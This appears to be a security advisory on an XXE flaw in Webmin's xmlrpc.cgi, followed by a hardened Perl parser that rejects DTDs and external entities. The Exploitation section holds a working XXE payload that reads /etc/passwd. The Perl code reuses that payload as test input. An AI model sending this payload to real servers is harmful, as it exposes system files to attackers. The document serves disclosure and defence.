Description
From http://www.webmin.com:
Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can set up user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin.
By default, the endpoint xmlrpc.cgi is enabled behind HTTP basic auth, but only 3 users are allowed to POST data to it:
- root
- admin
- sysadm
As its name suggests, the service handles XML messages. It relies on the Perl XML::Parser module, which is used without disabling entity processing:
Exploitation
Because of this permissive parser, an authenticated attacker can exploit an XXE to retrieve local files or discover internal networks, with root rights. Simple XXE payloads can be used, for example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE methodCall [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>&file;</methodName>
</methodCall>
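The root cause above is that XML::Parser ships a default ExternEnt handler that resolves external entity system identifiers (file:// and http:// URIs), so any DOCTYPE in a request body becomes a file read or an outbound request. The following is an added example, not Webmin's code: a strict wrapper around XML::Parser that rejects any request carrying a DTD before an entity can be declared, and refuses external entity resolution as a second line of defence. The function name parse_methodcall_strict, the benign request and the reuse of the payload above as constructed test input are assumptions of this example.

```perl
#!/usr/bin/perl
# Added example (not Webmin's own code): a hardened XML-RPC request gate.
# XML::Parser's default ExternEnt handler fetches file:// and http:// system
# identifiers; overriding Doctype and ExternEnt means it is never reached.
use strict;
use warnings;
use XML::Parser;

# Parse an XML-RPC body and return the called method name; dies with a reason
# on any DTD, any external entity reference, or malformed XML.
sub parse_methodcall_strict {
    my ($body) = @_;
    my ($method, $in_name) = ('', 0);
    my $p = XML::Parser->new(
        Handlers => {
            # Any DOCTYPE (internal or external subset) is rejected outright,
            # so no <!ENTITY ...> declaration can ever be processed.
            Doctype => sub {
                my ($xp, $name) = @_;
                $xp->xpcroak("DTD not allowed (DOCTYPE $name)");
            },
            # Belt and braces: never resolve an external entity, whatever
            # the system identifier points at.
            ExternEnt => sub {
                my ($xp, $base, $sysid) = @_;
                $xp->xpcroak("external entity refused: $sysid");
            },
            Start => sub { my ($xp, $el) = @_; $in_name = 1 if $el eq 'methodName' },
            End   => sub { my ($xp, $el) = @_; $in_name = 0 if $el eq 'methodName' },
            # Char may be called several times per text node; accumulate.
            Char  => sub { my ($xp, $txt) = @_; $method .= $txt if $in_name },
        },
    );
    $p->parse($body);    # dies via the handlers above or on malformed XML
    return $method;
}

# Constructed sample requests (assumed, not captured traffic).
my $benign = '<?xml version="1.0"?>'
           . '<methodCall><methodName>system.listMethods</methodName></methodCall>';
my $xxe = <<'XML';
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE methodCall [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>&file;</methodName>
</methodCall>
XML

for my $req ($benign, $xxe) {
    my $m = eval { parse_methodcall_strict($req) };
    if (defined $m) {
        print "accepted: method=$m\n";
    } else {
        print "rejected: $@";
    }
}
```

Run as a plain Perl script with XML::Parser installed: the benign request is accepted with method=system.listMethods, while the XXE payload is rejected at the DOCTYPE line and /etc/passwd is never opened. Rejecting the DTD wholesale is the right default for XML-RPC, since the methodCall grammar has no legitimate use for entity declarations; the ExternEnt override only matters if a future code path re-enables DTD parsing.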